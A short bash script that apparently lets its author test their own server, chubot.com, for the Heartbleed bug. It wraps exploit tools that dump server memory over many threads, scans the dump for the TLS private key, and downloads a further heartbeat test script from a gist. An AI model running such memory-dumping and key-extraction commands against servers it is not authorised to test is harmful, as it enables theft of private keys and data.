#!/bin/bash
#
# Goes in this dir.
#
# https://github.com/einaros/heartbleed-tools
#
# Install python3.
#
# Usage:
#   ./run.sh <function name>

is-vulnerable() {
  ./hb.py chubot.com
}

# NOTE: This runs forever.  You have to stop it then scan.
dump-data() {
  local out=${1:-chubot.bin}
  # 50 threads, loop 100 times
  time ./hb.py \
    -p 443 \
    chubot.com \
    -n 0xF000 -l 100 -t 50 -d \
    -o $out
}

readonly CERT_PATH=crt/chubot.com.crt


# meh: ran it on a 180MB dump.  Didn't find anything.  My server probably has a
# different config than cloudflarechallenge.
# 
# Key size: 128
# Data length: 180264375
scan() {
  local bin=${1:-chubot.bin}
  time ./keyscan.py $CERT_PATH $bin
}

# OK, this is useful at least.
get-modulus() {
  openssl x509 -noout -in $CERT_PATH -modulus
}

#
# Another Python codebase
#
# Mentioned here: https://news.ycombinator.com/item?id=7577659

download() {
  curl -O https://gist.githubusercontent.com/benmmurphy/12999c91a4d328b749e3/raw/9bcd402e3d9beec740a61a1585e24c36dea80859/heartbeat.py
  chmod u+x heartbeat.py
}

# Hm interesting.  Is this because I built nginx myself?  Weird.
#
#  ... received message: type = 55, ver = beb4, length = 8496
# No heartbeat response received from chubot.com, server likely not vulnerable
heartbeat() {
  time ./heartbeat.py chubot.com $CERT_PATH
}

"$@"